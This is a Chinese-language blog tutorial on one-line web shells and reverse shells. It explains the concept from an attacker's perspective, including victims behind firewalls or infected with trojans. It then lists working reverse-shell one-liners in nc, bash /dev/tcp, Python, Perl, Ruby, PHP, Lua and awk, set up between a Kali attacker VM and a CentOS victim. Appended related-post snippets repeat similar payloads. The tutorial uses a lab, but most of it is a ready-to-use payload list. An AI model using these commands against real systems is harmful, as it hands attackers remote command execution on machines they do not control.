一句话木马和反弹shell

最新推荐文章于 2024-04-18 11:04:32 发布
最新推荐文章于 2024-04-18 11:04:32 发布
阅读量1.8k 收藏 3
点赞数
文章标签: linux centos 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/supermeatboy223/article/details/121567201
版权

一句话木马

 使用哥斯拉 要在Java环境下使用

点击左上角目标 生成

 在添加索要挂载的网页填入对应的url测试连接 

反弹shell

什么是反弹shell?

  反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。

为什么要反弹shell?

通常用于被控端因防火墙受限、权限不足、端口被占用等情形。

举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢?

有如下情况:

1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。

2.目标机器的ip动态改变,你不能持续控制。

3.由于防火墙等限制,对方机器只能发送请求,不能接收请求。

4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。

那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

操作方法

我们采用两台虚拟机 

Kali作为攻击机 ip 192.168.77.131

CentOS 为被攻击机  ip 192.168.77.134

nc -lvvp port  kali上执行 port 为端口号   这是让攻击机监听对应端口
nc -e /bin/bash  攻击机ip  port端口   centos

这里的两个端口需保持一致

 

 出现这行代码代表已经成功控制 Centos的shell

测试 在kali中输入 ifconfig

 可见此时ip为 192.168.77.134 为Centos端的ip 说明此时已经成功的控制了Centos的数据

bash -i >& /dev/tcp/攻击主机ip/10000 0>&1 centos
此命令效果如上

Python环境下 

先让攻击机监听端口 代码同上 然后在CentOs中使用此命令

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.77.131",3000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

注意此时 ip 应填写攻击端 ip 端口号保持一致 后续所有方法都要这样。

执行后效果

 这样就是成功 测试如上图。

 Perl

perl -e '
use Socket;
$i="192.168.7.131";
$p=3080;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");
exec("/bin/sh -i");};'

ruby

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.77.131","8000");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

php


php -r '$sock=fsockopen("192.168.77.131",8000);exec("/bin/bash -i <&3 >&3 2>&3");'

Lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.77.131','8000');os.execute('/bin/sh -i <&3 >&3 2>&3');"

awk


awk 'BEGIN{s="/inet/tcp/0/192.168.77.131/8000";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'

这里提供在不同靶机环境下所执行的代码,具体情况具体使用。

supermeatboy223
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
「渗透」:一句话木马反弹shell的思路
binaxin的博客
10-06 2150
前提:现在情况是已经上传了一句话木马,可以执行命令如:ls,pwd,whoami等;问题在于,不管用python、bash还是perl都反弹不了,偷不了懒,就上msf把。 http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=pwd /u01/oracle/user_projects/domains/base_domain http://target-ip/where/muma/path/are/158.
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1319
什么是反弹shell反弹shellreverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
Supershell 一款牛叉闪闪的工具,算法真题解析:美团+Tencent+字节跳动+阿里+360+拼多多
2301_78398209的博客
04-18 398
【代码】Supershell 一款牛叉闪闪的工具,算法真题解析:美团+Tencent+字节跳动+阿里+360+拼多多。
Simple python reverse shell
abg49988的博客
08-22 142
import base64,sys; import socket,struct s=socket.socket(2,socket.SOCK_STREAM) s.connect(('Attack's IP address',ListenerPort)) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d...
河马php一句话木马,网络入侵溯源跟踪:Redis反弹Shell
weixin_29315091的博客
03-10 423
*本文作者:6265113,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。背景介绍:近期客服的妹子来找我说,客户服务器被恶意上传了大量的非法页面,客户要求三天内必须确认漏洞并提出修复方案,作为伪粉丝的我正在听某某女神唱歌,突然被打断一种莫名的惆怅在心理慢慢升起,赶紧去洗了一把脸开始干活拉,理一理思路先。分析思路:1、非法页面所属用户是谁 ,上传时间是什么时候?2、拥有什么权限可以上传非法...
一句话反弹shell
whatday的专栏
10-25 2239
1.bash反弹 攻击机监听端口 netcat: nc -nvlp 4444 -n: 不反向解析dns,即不通过ip解析域名 no dns -v: 详细信息输出 verbose -l: 监听 listen -p: 指定端口 port 靶机执行shell命令 bash -i >& /dev/tcp/攻击机ip/攻击机port 0>&amp...
一句话木马要点和防范注意事项
最新发布
05-24
总之,防范一句话木马的关键在于强化服务器的安全配置,提高代码质量,以及持续的监控和维护。只有这样,才能有效地抵御这类威胁,保护网络环境的安全。同时,对于IT从业人员来说,了解和学习这些知识,不仅能提升...
php一句话cmdshell新型 (非一句话木马)
10-30
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
探索基于.NET下实现一句话木马之asmx篇1
08-03
【.NET下实现一句话木马之asmx篇】 在网络安全领域,木马程序通常被视为恶意软件,但在合法的安全研究和漏洞测试中,了解其工作原理是至关重要的。本篇文章主要探讨了如何在.NET环境中利用ASMX(Web Service)技术...
Reverse-Shell-with-autorun:在python上实现的反向shell,包括服务器,客户端和自动运行代码。 从服务器在后台控制客户端PC命令行
04-13
带自动运行的反向外壳 在python上实现的反向shell,包括服务器,客户端和自动运行代码。 从服务器在后台控制客户端PC命令行
HTTP-Reverse-Shell:Python中的HTTP反向Shell
05-22
HTTP反向外壳 这是用Python编程的HTTP Reverse Shell。 它用于建立从客户端到服务器端的反向HTTP连接。 先决条件 Python 用法 在客户端上传输客户端程序 在服务器端传输服务器程序 运行服务器端程序以开始侦听 运行客户端程序 建立连接 贡献者
python反向连接shell,可穿透防火墙
07-30
python reverse_shell.py 反弹目的ip 3322 反弹目的ip 执行nc -l 3322 即可连结 被控端
PHP脚本反弹SHELL
10-20
此脚本可以反弹SHELL到指定地址,得到交互交shell
linux udp反弹shell脚本,Linux UDP反弹shell脚本
weixin_42148975的博客
05-08 567
* 无端口 * 成功启动后无残余文件 * 一般情况下没有UDP单包512字节的问题。当然你要是执行奇葩的命令我也没办法 * 非交互式shell,也就是说,你不能用回车来写多行命令。这个问题不是不能解决,而是如果解决这个问题,会造成另外一个我不能忍受的问题。而且反* 无端口* 成功启动后无残余文件* 一般情况下没有UDP单包512字节的问题。当然你要是执行奇葩的命令我也没办法* 非交互式shell,...
反弹shell
m0_63510587的博客
11-26 266
反弹shell,是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 在攻击主机上执行端口监听: nc -lvvp port #port 为攻击机的端口号,并此端口未被占用 一、在目标主机上执行: bash -i >& /dev/tcp/0.0.0.0/port 0>&1 #0.0.0....
python 反弹shell,加了UDP
weixin_34349320的博客
03-20 227
2019独角兽企业重金招聘Python工程师标准>>> ...
Socket的TCP、UDP连接学习以及实现远程shell反弹
weujie
05-08 560
Socket 学习的视频:https://www.bilibili.com/video/BV1UJ411M7tx?p=2 TCP连接:可靠的、收发数据前 需要建立连接,三次握手。 UDP:不可靠的,不需要建立连接 创建套接字 socket.socket(family[,type[,port]) family 可使用AF_UNIX 或者AF_INET AF_INET 使用IPV4 协议 AF_INET6 使用ipv6协议 type 类型,可以是面向连接还是非连接的 . SOCK_STREAM
反弹shell和木马的关系
09-03
反弹shell和木马是信息安全中常用的两个概念。 "反弹shell"是指通过在目标系统上运行一个恶意代码,将目标系统上的控制权反向连接到攻击者的系统上。攻击者可以通过反弹shell来执行各种操作,如获取目标系统的敏感信息、远程执行命令等。反弹shell通常是通过操纵网络连接进行的,攻击者利用漏洞或后门将恶意代码注入目标系统,然后通过网络连接将目标系统上的控制权反向连接回攻击者的系统。 而"木马"是指一种隐藏在正常程序或文件中的恶意软件,它可以在用户不知情的情况下运行,并在背后执行一系列恶意操作。木马可以被用来实现不同的攻击目的,例如窃取用户敏感信息、控制受感染的系统、进行网络攻击等。木马通常通过社交工程、漏洞利用或者下载不可信来源的软件等途径传播到目标系统中。 反弹shell和木马之间存在一定的联系。在某些情况下,攻击者可以利用反弹shell的功能来将一个木马程序注入到目标系统中。通过反弹shell,攻击者可以获取目标系统的权限并执行命令,然后利用这个权限将木马程序上传到目标系统中,从而实现对目标系统的长期控制和监控。反弹shell提供了一个通道,使攻击者能够以交互的方式与目标系统进行通信,而木马则是攻击者在目标系统上部署的恶意软件,用于实现具体的攻击目标。 总结起来,反弹shell是一种技术手段,用于获取目标系统的控制权,而木马则是一种恶意软件,用于实现具体的攻击目标。在某些情况下,反弹shell可以被用来注入和部署木马程序。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [反弹shell---生成木马反弹shell(Windows)](https://blog.csdn.net/weixin_50956890/article/details/124571904)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值